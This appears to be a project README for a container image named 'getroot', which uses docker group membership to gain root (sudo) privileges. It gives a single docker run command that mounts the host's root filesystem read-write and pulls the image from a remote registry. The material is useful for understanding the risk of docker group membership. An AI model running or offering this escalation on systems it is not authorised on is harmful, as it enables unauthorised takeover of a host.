# getroot 🐳

This container will allow you to elevate to `sudo` privileges in a single line on systems where you're part of the `docker` group. It also works when Docker is installed [via Snap](https://snapcraft.io/docker).

#### Usage
```sh
docker run --rm -it -e HOSTUID="$(id -u)" -v "/:/host:rw" "registry.gitlab.com/alexhaydock/getroot"
```
